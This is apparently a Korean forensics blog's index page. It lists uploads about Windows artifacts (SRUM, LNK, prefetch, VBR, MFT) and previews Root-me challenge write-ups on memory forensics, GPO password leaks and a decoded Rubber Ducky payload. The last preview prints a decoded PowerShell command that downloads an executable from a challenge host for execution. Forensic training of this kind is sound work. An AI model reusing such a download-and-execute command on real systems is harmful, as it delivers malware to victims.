전체 글
[Upload] SRUM 아티팩트
SRUM 에 대한 글이 업로드 되었습니다. 시스템 자원 사용량을 다루는 아티팩트로 파일 실행 흔적을 찾는데 사용되는 아티팩트입니다. 흔하게들 비휘발성 데이터라고 생각하고 있지만, 실제로 SRUM 데이터는 휘발성 데이터라는 점이 인상깊게 봐야할 포인트입니다. https://www.forensic-cheatsheet.com/artifacts/srum 읽어보시고 궁금한 내용이나 수정해야하는 내용은 본 게시글에 공개댓글로 남겨주시면 감사하겠습니다.
[Upload] LNK File 아티팩트
LNK 파일 아티팩트에 대한 글이 업로드 되었습니다. LNK 파일은 윈도우 시스템에서 파일의 실행 정보를 파악할 수 있는 주요 아티팩트입니다. 주로 LNK 파일의 구조와 어떤 데이터가 들어있는지 알아보았습니다. https://www.forensic-cheatsheet.com/artifacts/lnkfile 읽어보시고 궁금한 내용이나 수정해야하는 내용은 본 게시글에 공개댓글로 남겨주시면 감사하겠습니다.
[Upload] prefetch 아티팩트
프리패치(prefetch) 아티팩트에 대한 글이 업로드 되었습니다. 아티팩트와 관련해서는 첫 글이기도 합니다. 앞으로 꾸준히 작성해 보겠습니다 :) 슈퍼패치도 같이 다루고자 했는데, 사용을 잘 하지 않아 생략했습니다. 문의가 많이 들어오면 추가하도록 하겠습니다. https://www.forensic-cheatsheet.com/prefetch 읽어보시고 궁금한 내용이나 수정해야하는 내용은 본 게시글에 공개댓글로 남겨주시면 감사하겠습니다.
[Upload] VBR
Volume Boot Record에 대한 글이 업로드 되었습니다. NTFS 에서만 사용되는 개념이 아닌, 여러 파일시스템에서도 사용되는 개념이지만, NTFS에 대해서만 우선적으로 다루어 보았습니다 https://www.forensic-cheatsheet.com/filesystem/vbr VBR What is VBR? www.forensic-cheatsheet.com 지난주에 작성한 글이지만 카카오 서버 이슈로 인해 빨리 공지를 올리지 못했습니다 읽어보시고 궁금한 내용이나 수정해야하는 내용은 본 게시글에 공개댓글로 남겨주시면 감사하겠습니다.
![[Upload] MFT](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbkbvdl%2FbtrOmUqtmKv%2F8FYJjli8jV0j1mhqTIPtZk%2Fimg.png)
[Upload] MFT
MFT에 대한 글이 업로드되었습니다. 연관있는 다른 내용도 차차 다루고자 합니다. 읽어보시고 궁금한 내용이나 수정해야하는 내용은 본 게시글에 공개댓글로 남겨주시면 감사하겠습니다
![[Root-me] : Command & Control - level 3](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcezBRs%2FbtqU4ZSMAk0%2FokWakiMTxX6c3ebiT6BQv0%2Fimg.png)
[Root-me] : Command & Control - level 3
malware 를 찾아야 한다고 한다. malware 는 무엇일지 알아보자 "일반적인 프로그램 동일한 프로그램이나 사용자 의지와 상관 없이 시스템을 파괴하거나정보를 유출하는 등의 악의적인 활동을 수행하도록 의도적으로 제작된 소프트웨어" 그럼 의도치 않게 실행되는 아이를 찾아보면 되겠다. 역시 volatility 를 이용해서 찾아보도록 하자. 먼저 imageinfo를 확인해 준다. 사용할 profile 은 Win7SP1x86_23418 이다. 이제 pslist를 이용해서 사용된 프로세스들의 흔적을 찾아보자. 뭐가 많이 나오지만, 지금 우리가 이걸 보고 바로 malware를 판단하기는 힘들 수도 있다. malware는 자동으로 실행될 확률이 있기 때문에 자동으로 돌아가는 프로세스들을 의심해 보았으나, aut..
![[Root-me] : Active Directory - GPO](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FC1mmo%2FbtqU3o6r0ni%2FlptPkfDGSKfHMxYbVO4iQk%2Fimg.png)
[Root-me] : Active Directory - GPO
Active Directory GPO 에 대해서 알아보았다. GPO란 Group Policy 에 대한 것으로, Admin이 그 하위 컴퓨터들을 관리하는 옵션이다. Active Directory 는 위의 정보를 저장하고 있는 DB 정도로 생각하면 되겠다. 그럼 이런 정책을 관리하는 중에 pw가 유출 될 수 있는 것 같다. wireshark 로 파일을 분석하던 중 집중해서 볼 만한 것을 찾았다. 이렇게 다른 기기에 대해서 Policy를 다루는 행위를 SMB2 패킷에서 볼 수 있었다. SMB2 패킷들을 본 결과 비밀번호가 내용으로 전달되지는 않는 것으로 확인했다. 또 패킷들이 파일을 생성 전달하는 것으로 보아 파일의 형태로 비밀번호가 전달될 수도 있기 때문에 추출 가능한 파일이있나 찾아보았다., 각 파일들에 ..
![[Root-me] : Ugly Duckling](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FWNTHG%2FbtqUTl3FEWc%2Fk77Dh1swoOXq45I39dpoo0%2Fimg.png)
[Root-me] : Ugly Duckling
한참을 고민하다 알아낸 것은 해당 바이너리 파일이 형식이 있다는 것이었다. 이렇게 생겨먹은 아이인데, duck script 를 이용해서 코드를 실행한다고 하니 복호화를 해보도록 하자. ducktoolkit.com/decode# 에서 파일을 넣고 output을 받았다. 요런 이미지를 뜨게 하고, 특정 행동을 하도록 설계된 것이었따. 모든 행동을 본 결과 마지막으로 powershell로 무언가를 실행하는데, 암호화가 되어있었다. baset64로 디코딩해보니 결과가 나왔는데 다음과 같다. iex (New-Object System.Net.WebClient).DownloadFile('http://challenge01.root-me.org/forensic/ch14/files/666c61676765643f.exe',..